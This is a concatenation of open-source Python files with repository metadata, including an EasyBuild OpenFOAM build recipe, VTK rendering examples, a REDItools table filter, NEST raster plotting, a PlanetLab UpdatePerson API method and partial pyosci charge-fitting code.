                "checking .*",
                "warning.*",
                "configure: creating.*",
                "%s .*" % os.environ['CC'],
                "wmake .*",
                "Making dependency list for source file.*",
                "\s*\^\s*",  # warning indicator
                "Cleaning .*",
            ]
            run_cmd_qa(cmd_tmpl % 'Allwmake.firstInstall', qa, no_qa=noqa, log_all=True, simple=True)
        else:
            run_cmd(cmd_tmpl % 'Allwmake', log_all=True, simple=True, log_output=True)

    def install_step(self):
        """Building was performed in install dir, so just fix permissions."""
        # fix permissions of OpenFOAM dir
        fullpath = os.path.join(self.installdir, self.openfoamdir)
        adjust_permissions(fullpath, stat.S_IROTH, add=True, recursive=True, ignore_errors=True)
        adjust_permissions(fullpath, stat.S_IXOTH, add=True, recursive=True, onlydirs=True, ignore_errors=True)

        # fix permissions of ThirdParty dir and subdirs (also for 2.x)
        # if the thirdparty tarball is installed
        fullpath = os.path.join(self.installdir, self.thrdpartydir)
        if os.path.exists(fullpath):
            adjust_permissions(fullpath, stat.S_IROTH, add=True, recursive=True, ignore_errors=True)
            adjust_permissions(fullpath, stat.S_IXOTH, add=True, recursive=True, onlydirs=True, ignore_errors=True)

    def sanity_check_step(self):
        """Custom sanity check for OpenFOAM"""

        psubdir = "linux64%sDPOpt" % self.wm_compiler

        openfoam_extend_v3 = 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0')
        if openfoam_extend_v3 or LooseVersion(self.version) < LooseVersion("2"):
            toolsdir = os.path.join(self.openfoamdir, "applications", "bin", psubdir)
            libsdir = os.path.join(self.openfoamdir, "lib", psubdir)
            dirs = [toolsdir, libsdir]
        else:
            toolsdir = os.path.join(self.openfoamdir, "platforms", psubdir, "bin")
            libsdir = os.path.join(self.openfoamdir, "platforms", psubdir, "lib")
            dirs = [toolsdir, libsdir]

        # some randomly selected binaries
        # if one of these is missing, it's very likely something went wrong
        bins = [os.path.join(self.openfoamdir, "bin", x) for x in ["foamExec", "paraFoam"]] + \
               [os.path.join(toolsdir, "buoyant%sSimpleFoam" % x) for x in ["", "Boussinesq"]] + \
               [os.path.join(toolsdir, "%sFoam" % x) for x in ["boundary", "engine", "sonic"]] + \
               [os.path.join(toolsdir, "surface%s" % x) for x in ["Add", "Find", "Smooth"]] + \
               [os.path.join(toolsdir, x) for x in ["deformedGeom", "engineSwirl", "modifyMesh", "refineMesh", "vorticity"]]

        # check for the Pstream and scotchDecomp libraries, there must be a dummy one and an mpi one
        if 'extend' in self.name.lower():
            libs = [os.path.join(libsdir, x, "libPstream.so") for x in ["dummy", "mpi"]] + \
                   [os.path.join(libsdir, "libscotchDecomp.so")]
        else:
            libs = [os.path.join(libsdir, x, "libPstream.so") for x in ["dummy", "mpi"]] + \
                   [os.path.join(libsdir, x, "libptscotchDecomp.so") for x in ["dummy", "mpi"]] + \
                   [os.path.join(libsdir, "libscotchDecomp.so")] + \
                   [os.path.join(libsdir, "dummy", "libscotchDecomp.so")]

        if not 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion("2.3.0"):
            # surfaceSmooth is replaced by surfaceLambdaMuSmooth in OpenFOAM v2.3.0
            bins.remove(os.path.join(toolsdir, "surfaceSmooth"))
            bins.append(os.path.join(toolsdir, "surfaceLambdaMuSmooth"))

        custom_paths = {
            'files': [os.path.join(self.openfoamdir, 'etc', x) for x in ["bashrc", "cshrc"]] + bins + libs,
            'dirs': dirs,
        }

        super(EB_OpenFOAM, self).sanity_check_step(custom_paths=custom_paths)

    def make_module_extra(self):
        """Define extra environment variables required by OpenFOAM"""
        txt = super(EB_OpenFOAM, self).make_module_extra()
        env_vars = [
            ("WM_PROJECT_VERSION", self.version),
            ("FOAM_INST_DIR", self.installdir),
            ("WM_COMPILER", self.wm_compiler),
            ("WM_MPLIB", self.wm_mplib),
            ("FOAM_BASH", os.path.join(self.installdir, self.openfoamdir, "etc", "bashrc")),
            ("FOAM_CSH", os.path.join(self.installdir, self.openfoamdir, "etc", "cshrc")),
        ]
        for (env_var, val) in env_vars:
            txt += self.module_generator.set_environment(env_var, val)
        return txt
ULHPC/modules
easybuild/easybuild-easyblocks/easybuild/easyblocks/o/openfoam.py
Python
mit
12,010
[ "ParaView" ]
194c9774bc16e9211bf35a6857b74320dc5133a0879031462a46dbf5fc927d4d
#!/usr/bin/env python

# This example shows how to apply a vtkImageData texture to a plane
# vtkPolyData object.
# Note: Input jpg file can be located in the VTKData repository.
#
# @author JBallesteros
##

import vtk

jpegfile = "earth_display.jpg"

# Create a render window
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(480, 480)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)

# Generate plane polydata
plane = vtk.vtkPlaneSource()

# Read the image data from a file
reader = vtk.vtkJPEGReader()
reader.SetFileName(jpegfile)

# Create texture object
# (version-guarded like the mapper below: SetInput() only exists in VTK 5)
texture = vtk.vtkTexture()
if vtk.VTK_MAJOR_VERSION <= 5:
    texture.SetInput(reader.GetOutput())
else:
    texture.SetInputConnection(reader.GetOutputPort())

# Map texture coordinates
map_to_plane = vtk.vtkTextureMapToPlane()
if vtk.VTK_MAJOR_VERSION <= 5:
    map_to_plane.SetInput(plane.GetOutput())
else:
    map_to_plane.SetInputConnection(plane.GetOutputPort())

# Create mapper and set the mapped texture as input
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
    mapper.SetInput(map_to_plane.GetOutput())
else:
    mapper.SetInputConnection(map_to_plane.GetOutputPort())

# Create actor and set the mapper and the texture
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.SetTexture(texture)
ren.AddActor(actor)

iren.Initialize()
renWin.Render()
iren.Start()
nicjhan/mom-particles
vtk/plane.py
Python
gpl-2.0
1,219
[ "VTK" ]
d766e8d7c7c0dca5bbe6e53d9125661e30dc6188c35613ac5348ac6f0c2935fa
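The VTK 5-to-6 pipeline split handled inline above recurs in every script of this kind; a small helper that hides the SetInput/SetInputConnection difference is one way to keep such examples portable. This is a sketch, not part of the original file, and `connect` is a hypothetical name:

import vtk

def connect(consumer, producer):
    # Route producer -> consumer on both VTK 5 (SetInput) and VTK 6+ pipelines.
    if vtk.VTK_MAJOR_VERSION <= 5:
        consumer.SetInput(producer.GetOutput())
    else:
        consumer.SetInputConnection(producer.GetOutputPort())

reader = vtk.vtkJPEGReader()
reader.SetFileName("earth_display.jpg")
texture = vtk.vtkTexture()
connect(texture, reader)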
#!/home/epicardi/bin/python27/bin/python
# Copyright (c) 2013-2014 Ernesto Picardi <ernesto.picardi@uniba.it>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

"""
To do: filtering according to strand of positions in table file
"""

import sys, time, getopt, string, os, random

try:
    import pysam
except:
    sys.exit('Pysam module not found.')

pid = str(os.getpid() + random.randint(0, 999999999))

def usage():
    print """
USAGE: python FilterTable.py [options]
Options:
-i    Table file
-f    Sorted file with positions to filter in
-s    Sorted file with positions to filter out
-F    Features to filter in (separated by comma)
-S    Features to filter out (separated by comma)
-E    Exclude positions filtered out
-o    Save filtered lines to a file [stdout]
-p    Print simple statistics
-h    Print this help
"""

try:
    opts, args = getopt.getopt(sys.argv[1:], 'i:o:f:hs:F:S:Ep', ["help"])
except getopt.GetoptError, err:
    print str(err)
    usage()
    sys.exit()

if len(opts) == 0:
    usage()
    sys.exit()

tablefile, outfile = '', ''
ffile, ofile = '', ''
save, ff, fo, exp, ps = 0, 0, 0, 0, 0
infeat, outfeat = [], []

for o, a in opts:
    if o in ("-h", "--help"):
        usage()
        sys.exit()
    elif o == "-i":
        tablefile = a
        if not os.path.exists(tablefile):
            usage()
            sys.exit('Table file not found')
    elif o == "-o":
        outfile = a
        save = 1
    elif o == "-s":
        ofile = a
        fo = 1
        if ofile == '':
            usage()
            sys.exit('Sorted file with positions to filter out not found.')
    elif o == "-f":
        ffile = a
        ff = 1
        if ffile == '':
            usage()
            sys.exit('Sorted file with positions to filter in not found.')
    elif o == "-F":
        infeat = [x.lower() for x in a.split(',')]
    elif o == "-S":
        outfeat = [x.lower() for x in a.split(',')]
    elif o == "-E":
        exp = 1
    elif o == "-p":
        ps = 1
    else:
        assert False, "unhandled option"

# Functions
def filterIn(chr, exfeat, pos):
    if len(exfeat) == 0:
        return 1
    if ff and not chr in contigf:
        return 0
    elif not ff:
        return 1
    res = [(kk.feature).lower() for kk in tabixf.fetch(reference=chr, start=pos, end=pos + 1, parser=pysam.asGTF())]
    for i in exfeat:
        if i in res:
            return 1
    return 0

def filterOut(chr, exfeat, pos):
    if len(exfeat) == 0:
        return 0
    if fo and not chr in contigo:
        return 0
    elif not fo:
        return 0
    res = [(kk.feature).lower() for kk in tabixo.fetch(reference=chr, start=pos, end=pos + 1, parser=pysam.asGTF())]
    for i in exfeat:
        if i in res:
            return 1
    return 0

script_time = time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> START: %s\n" % (script_time))

if fo:
    if not os.path.exists(ofile + '.tbi'):
        sys.stderr.write('Indexing %s file.\n' % (ofile))
        ofile = pysam.tabix_index(ofile, preset='gff')
if ff:
    if not os.path.exists(ffile + '.tbi'):
        sys.stderr.write('Indexing %s file.\n' % (ffile))
        ffile = pysam.tabix_index(ffile, preset='gff')

if fo:
    tabixo = pysam.Tabixfile(ofile)
    contigo = tabixo.contigs
if ff:
    tabixf = pysam.Tabixfile(ffile)
    contigf = tabixf.contigs

sys.stderr.write('Reading Table file...\n')
if save:
    o = open(outfile, 'w')
f = open(tablefile)
y, x, xx = 0, 0, 0
for i in f:
    if i.strip() == '':
        continue
    if i.startswith('#'):
        continue
    if i.startswith('Region'):
        if save:
            o.write(i.strip() + '\n')
        else:
            sys.stdout.write(i)
        continue
    l = (i.strip('\n')).split('\t')
    xx += 1
    reg, pos = l[0], int(l[1])  # subtract 1 for the table lookup
    fin = filterIn(reg, infeat, pos - 1)
    fout = filterOut(reg, outfeat, pos - 1)
    if fin:
        if fout:
            x += 1
            if exp:
                continue
            if save:
                o.write('#' + i)
            else:
                sys.stdout.write('#' + i)
        else:
            y += 1
            if save:
                o.write(i)
            else:
                sys.stdout.write(i)
    else:
        x += 1
        if exp:
            continue
        if save:
            o.write('#' + i)
        else:
            sys.stdout.write('#' + i)
f.close()
if save:
    o.close()
if ff:
    tabixf.close()
if fo:
    tabixo.close()

if ps:
    sys.stdout.write("All positions: %i\n" % (xx))
    sys.stdout.write("Positions filtered in: %i\n" % (y))
    sys.stdout.write("Positions filtered out: %i\n" % (x))

script_time = time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> END: %s\n" % (script_time))
RNAEDITINGPLUS/main
node/reditools-1.0.4/reditools/FilterTable.py
Python
apache-2.0
5,006
[ "pysam" ]
0444e190b0137f9ad8aa2763ddc5f6c5673ff482cb9a2fa8f73e7d4eb80fd6a8
#! /usr/bin/env python
#
# raster_plot.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST.  If not, see <http://www.gnu.org/licenses/>.

import nest
import numpy
import pylab


def extract_events(data, time=None, sel=None):
    """
    Extracts all events within a given time interval or from a
    given set of neurons.
    - data is a matrix such that
      data[:,0] is a vector of all gids and
      data[:,1] a vector with the corresponding time stamps.
    - time is a list with at most two entries such that
      time=[t_max] extracts all events with t < t_max
      time=[t_min, t_max] extracts all events with t_min <= t < t_max
    - sel is a list of gids such that
      sel=[gid1, ..., gidn] extracts all events from these gids.
      All others are discarded.
    Both time and sel may be used at the same time such that all
    events are extracted for which both conditions are true.
    """
    val = []

    if time:
        t_max = time[-1]
        if len(time) > 1:
            t_min = time[0]
        else:
            t_min = 0

    for v in data:
        t = v[1]
        gid = v[0]
        if time and (t < t_min or t >= t_max):
            continue
        if not sel or gid in sel:
            val.append(v)

    return numpy.array(val)


def from_data(data, title=None, hist=False, hist_binwidth=5.0,
              grayscale=False, sel=None):
    """
    Plot raster from data array
    """
    ts = data[:, 1]
    d = extract_events(data, sel=sel)
    ts1 = d[:, 1]
    gids = d[:, 0]

    return _make_plot(ts, ts1, gids, data[:, 0], hist, hist_binwidth,
                      grayscale, title)


def from_file(fname, title=None, hist=False, hist_binwidth=5.0,
              grayscale=False):
    """
    Plot raster from file
    """
    if nest.is_sequencetype(fname):
        data = None
        for f in fname:
            if data is None:
                data = numpy.loadtxt(f)
            else:
                data = numpy.concatenate((data, numpy.loadtxt(f)))
    else:
        data = numpy.loadtxt(fname)

    return from_data(data, title, hist, hist_binwidth, grayscale)


def from_device(detec, title=None, hist=False, hist_binwidth=5.0,
                grayscale=False, plot_lid=False):
    """
    Plot raster from spike detector
    """
    if not nest.GetStatus(detec)[0]["model"] == "spike_detector":
        raise nest.NESTError("Please provide a spike_detector.")

    if nest.GetStatus(detec, "to_memory")[0]:

        ts, gids = _from_memory(detec)

        if not len(ts):
            raise nest.NESTError("No events recorded!")

        if plot_lid:
            gids = [nest.GetLID([x]) for x in gids]

        if title is None:
            title = "Raster plot from device '%i'" % detec[0]

        if nest.GetStatus(detec)[0]["time_in_steps"]:
            xlabel = "Steps"
        else:
            xlabel = "Time (ms)"

        return _make_plot(ts, ts, gids, gids, hist, hist_binwidth,
                          grayscale, title, xlabel)

    elif nest.GetStatus(detec, "to_file")[0]:
        fname = nest.GetStatus(detec, "filenames")[0]
        return from_file(fname, title, hist, hist_binwidth, grayscale)

    else:
        raise nest.NESTError("No data to plot. Make sure that either "
                             "to_memory or to_file are set.")


def _from_memory(detec):
    ev = nest.GetStatus(detec, "events")[0]
    return ev["times"], ev["senders"]


def _make_plot(ts, ts1, gids, neurons, hist, hist_binwidth, grayscale,
               title, xlabel=None):
    """
    Generic plotting routine that constructs a raster plot along with
    an optional histogram (common part in all routines above)
    """
    pylab.figure()

    if grayscale:
        color_marker = ".k"
        color_bar = "gray"
    else:
        color_marker = "."
        color_bar = "blue"

    color_edge = "black"

    if xlabel is None:
        xlabel = "Time (ms)"

    ylabel = "Neuron ID"

    if hist:
        ax1 = pylab.axes([0.1, 0.3, 0.85, 0.6])
        plotid = pylab.plot(ts1, gids, color_marker)
        pylab.ylabel(ylabel)
        pylab.xticks([])
        xlim = pylab.xlim()

        pylab.axes([0.1, 0.1, 0.85, 0.17])
        t_bins = numpy.arange(numpy.amin(ts), numpy.amax(ts),
                              float(hist_binwidth))
        n, bins = _histogram(ts, bins=t_bins)
        num_neurons = len(numpy.unique(neurons))
        heights = 1000 * n / (hist_binwidth * num_neurons)

        pylab.bar(t_bins, heights, width=hist_binwidth,
                  color=color_bar, edgecolor=color_edge)
        pylab.yticks(map(lambda x: int(x),
                         numpy.linspace(0.0, int(max(heights) * 1.1) + 5, 4)))
        pylab.ylabel("Rate (Hz)")
        pylab.xlabel(xlabel)
        pylab.xlim(xlim)
        pylab.axes(ax1)
    else:
        plotid = pylab.plot(ts1, gids, color_marker)
        pylab.xlabel(xlabel)
        pylab.ylabel(ylabel)

    if title is None:
        pylab.title("Raster plot")
    else:
        pylab.title(title)

    pylab.draw()

    return plotid


def _histogram(a, bins=10, range=None, normed=False):
    from numpy import asarray, iterable, linspace, sort, concatenate

    a = asarray(a).ravel()

    if range is not None:
        mn, mx = range
        if mn > mx:
            raise AttributeError, \
                "max must be larger than min in range parameter."

    if not iterable(bins):
        if range is None:
            range = (a.min(), a.max())
        mn, mx = [mi + 0.0 for mi in range]
        if mn == mx:
            mn -= 0.5
            mx += 0.5
        bins = linspace(mn, mx, bins, endpoint=False)
    else:
        if (bins[1:] - bins[:-1] < 0).any():
            raise AttributeError, "bins must increase monotonically."

    # best block size probably depends on processor cache size
    block = 65536
    n = sort(a[:block]).searchsorted(bins)
    for i in xrange(block, a.size, block):
        n += sort(a[i:i + block]).searchsorted(bins)
    n = concatenate([n, [len(a)]])
    n = n[1:] - n[:-1]

    if normed:
        db = bins[1] - bins[0]
        return 1.0 / (a.size * db) * n, bins
    else:
        return n, bins


def show():
    """
    Call pylab.show() to show all figures and enter the GUI main loop.
    Python will block until all figure windows are closed again.
    You should call this function only once at the end of a script.

    See also: http://matplotlib.sourceforge.net/faq/howto_faq.html#use-show
    """
    pylab.show()
gewaltig/cython-neuron
pynest/nest/raster_plot.py
Python
gpl-2.0
6,848
[ "NEURON" ]
4db8c520071fbf036d9b24a73b76aa934c77887c0b14c7b16fe91e05c7e3dc95
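A short usage sketch for the raster_plot module above. It assumes a NEST 2.x session where PyNEST is importable; the model name "iaf_neuron", the DivergentConnect/ConvergentConnect calls, and the rate value are NEST 2.x-era assumptions, not part of the original file:

import nest
import nest.raster_plot as raster_plot   # the module recorded above

nest.ResetKernel()
pg = nest.Create("poisson_generator", params={"rate": 8000.0})
neurons = nest.Create("iaf_neuron", 10)
sd = nest.Create("spike_detector", params={"to_memory": True})

nest.DivergentConnect(pg, neurons)    # one generator drives all neurons
nest.ConvergentConnect(neurons, sd)   # all neurons report to one detector
nest.Simulate(1000.0)

raster_plot.from_device(sd, hist=True, hist_binwidth=10.0)
raster_plot.show()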
from PLC.Faults import *
from PLC.Method import Method
from PLC.Parameter import Parameter, Mixed
from PLC.Auth import Auth
from PLC.Table import Row
from PLC.Persons import Person, Persons
from PLC.sendmail import sendmail
from PLC.TagTypes import TagTypes
from PLC.PersonTags import PersonTags, PersonTag
from PLC.Namespace import email_to_hrn

related_fields = list(Person.related_fields.keys())
can_update = ['first_name', 'last_name', 'title', 'email',
              'password', 'phone', 'url', 'bio', 'accepted_aup',
              'enabled'] + related_fields

class UpdatePerson(Method):
    """
    Updates a person. Only the fields specified in person_fields
    are updated, all other fields are left untouched.

    Users and techs can only update themselves. PIs can only update
    themselves and other non-PIs at their sites.

    Returns 1 if successful, faults otherwise.
    """

    roles = ['admin', 'pi', 'user', 'tech']

    accepted_fields = Row.accepted_fields(can_update, Person.fields)
    # xxx check the related_fields feature
    accepted_fields.update(Person.related_fields)
    accepted_fields.update(Person.tags)

    accepts = [
        Auth(),
        Mixed(Person.fields['person_id'],
              Person.fields['email']),
        accepted_fields
    ]

    returns = Parameter(int, '1 if successful')

    def call(self, auth, person_id_or_email, person_fields):
        # split provided fields
        [native, related, tags, rejected] = Row.split_fields(person_fields, [Person.fields, Person.related_fields, Person.tags])

        # type checking
        native = Row.check_fields(native, self.accepted_fields)
        if rejected:
            raise PLCInvalidArgument("Cannot update Person column(s) %r" % rejected)

        # Authenticated function
        assert self.caller is not None

        # Get account information
        persons = Persons(self.api, [person_id_or_email])
        if not persons:
            raise PLCInvalidArgument("No such account %s" % person_id_or_email)
        person = persons[0]

        if person['peer_id'] is not None:
            raise PLCInvalidArgument("Not a local account %s" % person_id_or_email)

        # Check if we can update this account
        if not self.caller.can_update(person):
            raise PLCPermissionDenied("Not allowed to update specified account")

        # Make requested associations
        for k, v in related.items():
            person.associate(auth, k, v)

        person.update(native)
        person.update_last_updated(False)
        person.sync(commit=True)

        # send a mail
        if 'enabled' in person_fields:
            To = [("%s %s" % (person['first_name'], person['last_name']), person['email'])]
            Cc = []
            if person['enabled']:
                Subject = "%s account enabled" % (self.api.config.PLC_NAME)
                Body = "Your %s account has been enabled. Please visit %s to access your account." % (self.api.config.PLC_NAME, self.api.config.PLC_WWW_HOST)
            else:
                Subject = "%s account disabled" % (self.api.config.PLC_NAME)
                Body = "Your %s account has been disabled. Please contact your PI or PlanetLab support for more information" % (self.api.config.PLC_NAME)
            sendmail(self.api, To=To, Cc=Cc, Subject=Subject, Body=Body)

        # if email was modified make sure to update the hrn tag
        if 'email' in native:
            hrn_tag = PersonTags(self.api, {'tagname': 'hrn', 'person_id': person['person_id']})
            if hrn_tag:
                old_hrn = hrn_tag[0]['value']
                root_auth = self.api.config.PLC_HRN_ROOT
                login_base = old_hrn.split('.')[-2]
                hrn = email_to_hrn("%s.%s" % (root_auth, login_base), person['email'])
                tags['hrn'] = hrn

        for (tagname, value) in tags.items():
            # the tagtype instance is assumed to exist, just check that
            tag_types = TagTypes(self.api, {'tagname': tagname})
            if not tag_types:
                raise PLCInvalidArgument("No such TagType %s" % tagname)
            tag_type = tag_types[0]
            person_tags = PersonTags(self.api, {'tagname': tagname, 'person_id': person['person_id']})
            if not person_tags:
                person_tag = PersonTag(self.api)
                person_tag['person_id'] = person['person_id']
                person_tag['tag_type_id'] = tag_type['tag_type_id']
                person_tag['tagname'] = tagname
                person_tag['value'] = value
                person_tag.sync()
            else:
                person_tag = person_tags[0]
                person_tag['value'] = value
                person_tag.sync()

        # Logging variables
        self.event_objects = {'Person': [person['person_id']]}

        # Redact password
        if 'password' in person_fields:
            person_fields['password'] = "Removed by API"
        self.message = 'Person %d updated: %s.' % \
                       (person['person_id'], list(person_fields.keys()))
        if 'enabled' in person_fields:
            self.message += ' Person enabled'

        return 1
dreibh/planetlab-lxc-plcapi
PLC/Methods/UpdatePerson.py
Python
bsd-3-clause
5,165
[ "VisIt" ]
01c146db508ac8857d8dc563dcd023932c3e47a827bb061574735aa9d3d5424b
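UpdatePerson above is exposed through PLCAPI's XML-RPC interface; a minimal client-side sketch follows, assuming a reachable PLCAPI endpoint and password-based authentication. The URL and credentials are placeholders, and xmlrpclib matches the Python 2 era of the server code:

import xmlrpclib  # Python 2, matching the server-side code above

server = xmlrpclib.ServerProxy('https://www.planet-lab.example/PLCAPI/')
auth = {'AuthMethod': 'password',
        'Username': 'pi@site.example',
        'AuthString': 'secret'}
# Only the fields passed in the dict are updated; all others stay untouched.
result = server.UpdatePerson(auth, 'user@site.example', {'title': 'Dr.'})
print result  # 1 on success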
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import vtk


def main():
    # Create five points.
    origin = [0.0, 0.0, 0.0]
    p0 = [1.0, 0.0, 0.0]
    p1 = [0.0, 1.0, 0.0]
    p2 = [0.0, 1.0, 2.0]
    p3 = [1.0, 2.0, 3.0]

    # Create a vtkPoints object and store the points in it
    points = vtk.vtkPoints()
    points.InsertNextPoint(origin)
    points.InsertNextPoint(p0)
    points.InsertNextPoint(p1)
    points.InsertNextPoint(p2)
    points.InsertNextPoint(p3)

    # Create a cell array to store the lines in and add the lines to it
    lines = vtk.vtkCellArray()

    for i in range(0, 3):
        line = vtk.vtkLine()
        line.GetPointIds().SetId(0, i)
        line.GetPointIds().SetId(1, i + 1)
        lines.InsertNextCell(line)

    # Create a polydata to store everything in
    linesPolyData = vtk.vtkPolyData()

    # Add the points to the dataset
    linesPolyData.SetPoints(points)

    # Add the lines to the dataset
    linesPolyData.SetLines(lines)

    # Setup actor and mapper
    colors = vtk.vtkNamedColors()

    mapper = vtk.vtkPolyDataMapper()
    mapper.SetInputData(linesPolyData)

    actor = vtk.vtkActor()
    actor.SetMapper(mapper)
    actor.GetProperty().SetLineWidth(4)
    actor.GetProperty().SetColor(colors.GetColor3d("Peacock"))

    # Setup render window, renderer, and interactor
    renderer = vtk.vtkRenderer()
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.SetWindowName("Long Line")
    renderWindow.AddRenderer(renderer)
    renderWindowInteractor = vtk.vtkRenderWindowInteractor()
    renderWindowInteractor.SetRenderWindow(renderWindow)
    renderer.AddActor(actor)
    renderer.ResetCamera()
    renderer.GetActiveCamera().Azimuth(30)
    renderer.GetActiveCamera().Elevation(30)
    renderer.ResetCameraClippingRange()
    renderer.SetBackground(colors.GetColor3d("Silver"))

    renderWindow.Render()
    renderWindowInteractor.Start()


if __name__ == '__main__':
    main()
lorensen/VTKExamples
src/Python/GeometricObjects/LongLine.py
Python
apache-2.0
1,952
[ "VTK" ]
77f23998ca10788900172e9e3c4e1d1a6044058293a875a5d89324d8b8b69d78
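The loop above wires three separate vtkLine cells through shared point ids; the same connected path can also be stored as a single vtkPolyLine cell, which is a common alternative. A sketch over the same five points (not part of the original file):

import vtk

# One polyline cell referencing all five point ids in order.
polyLine = vtk.vtkPolyLine()
polyLine.GetPointIds().SetNumberOfIds(5)
for i in range(5):
    polyLine.GetPointIds().SetId(i, i)

cells = vtk.vtkCellArray()
cells.InsertNextCell(polyLine)
# linesPolyData.SetLines(cells) would then replace the three vtkLine cells.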
""" Some basic routines to fit models """ from pyosci import tools from pyosci import plotting as plt from pyevsel.fitting import gauss, Model from functools import reduce import pylab as p import numpy as np import dashi as d import seaborn.apionly as sb d.visual() from collections import namedtuple from . import characteristics as c from . import charge_response_model as crm PALETTE = sb.color_palette() def pedestal_fit(filename, nbins, fig=None): """ Fit a pedestal to measured waveform data One shot function for * integrating the charges * making a histogram * fitting a simple gaussian to the pedestal * calculating mu P(hit) = (N_hit/N_all) = exp(QExCExLY) where P is the probability for a hit, QE is quantum efficiency, CE is the collection efficiency and LY the (unknown) light yield Args: filename (str): Name of the file with waveform data nbins (int): number of bins for the underlaying charge histogram """ head, wf = tools.load_waveform(filename) charges = -1e12 * tools.integrate_wf(head, wf) plt.plot_waveform(head, tools.average_wf(wf)) p.savefig(filename.replace(".npy", ".wf.pdf")) one_gauss = lambda x, n, y, z: n * gauss(x, y, z, 1) ped_mod = Model(one_gauss, (1000, -.1, 1)) ped_mod.add_data(charges, nbins, create_distribution=True, normalize=False) ped_mod.fit_to_data(silent=True) fig = ped_mod.plot_result(add_parameter_text=((r"$\mu_{{ped}}$& {:4.2e}\\", 1), \ (r"$\sigma_{{ped}}$& {:4.2e}\\", 2)), \ xlabel=r"$Q$ [pC]", ymin=1, xmax=8, model_alpha=.2, fig=fig, ylabel="events") ax = fig.gca() n_hit = abs(ped_mod._distribution.bincontent - ped_mod.prediction(ped_mod.xs)).sum() ax.grid(1) bins = np.linspace(min(charges), max(charges), nbins) data = d.factory.hist1d(charges, bins) n_pedestal = ped_mod._distribution.stats.nentries - n_hit mu = -1 * np.log(n_pedestal / ped_mod._distribution.stats.nentries) print("==============") print("All waveforms: {:4.2f}".format(ped_mod._distribution.stats.nentries)) print("HIt waveforms: {:4.2f}".format(n_hit)) print("NoHit waveforms: {:4.2f}".format(n_pedestal)) print("mu = -ln(N_PED/N_TRIG) = {:4.2e}".format(mu)) ax.fill_between(ped_mod.xs, 1e-4, ped_mod.prediction(ped_mod.xs),\ facecolor=PALETTE[2], alpha=.2) p.savefig(filename.replace(".npy", ".pdf")) return ped_mod def create_charge_response_from_file(name): """ One shot function to create a default charge spectrum from a file with waveform data Args: name (str): path to a file with numpy readable waveform data """ head, wf = tools.load_waveform(name) plt.plot_waveform(head, tools.average_wf(wf)) all_charges = 1e12 * np.array([-1 * tools.integrate_wf(head, w) for w in wf]) # all_charges = all_charges[all_charges > -0.53] mu = c.calculate_mu(all_charges, 200) nhit, nall = c.get_n_hit(all_charges, 200) charge_response_model = crm.construct_charge_response_model(all_charges,\ model_2PE_response=True,\ convolved_exponential=True,\ lowest_mpe_contrib=2) fitparams = namedtuple("fitparams", ["N_i", "mu_p", "sigma_p", "p", "A", "mu", "sigma"]) startparams = fitparams(1, -.2, .1, .8, .3, 3, .2) bounds = ((0, -3, 0, .0, 0, 0, .05), (1, 0, .5, 1, 100, 5, 5)) model = fit_model(all_charges, charge_response_model, startparams, rej_outliers=False,\ bounds=bounds) fig = model.plot_result(ymin=1e-4, xmax=5, xlabel=r"$Q$ [pC]",\ model_alpha=.8,\ add_parameter_text=((r"$\sigma_{{ped}}$& {:4.2e}\\", 2), (r"$\mu_{{SPE}}$& {:4.2e}\\", 5),\ (r"$\sigma_{{SPE}}$& {:4.2e}\\", 6),\ (r"$p_{{exp}}$& {:4.2e}\\", 3))) return model, fig ############################################################## def fit_model(charges, 
model, startparams=None, \ rej_outliers=False, nbins=200, \ silent=False,\ parameter_text=((r"$\mu_{{SPE}}$& {:4.2e}\\", 5),), use_minuit=False,\ normalize=True,\ **kwargs): """ Standardazied fitting routine Args: charges (np.ndarray): Charges obtained in a measurement (no histogram) model (pyevsel.fitting.Model): A model to fit to the data startparams (tuple): initial parameters to model, or None for first guess Keyword Args: rej_outliers (bool): Remove extreme outliers from data nbins (int): Number of bins parameter_text (tuple): will be passed to model.plot_result use_miniuit (bool): use minuit to minimize startparams for best chi2 normalize (bool): normalize data before fitting silent (bool): silence output Returns: tuple """ if rej_outliers: charges = reject_outliers(charges) if use_minuit: from iminuit import Minuit # FIXME!! This is too ugly. Minuit wants named parameters ... >.< assert len(startparams) < 10; "Currently more than 10 paramters are not supported for minuit fitting!" assert model.all_coupled, "Minuit fitting can only be done for models with all parmaters coupled!" names = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k"] funcstring = "def do_min(" for i,__ in 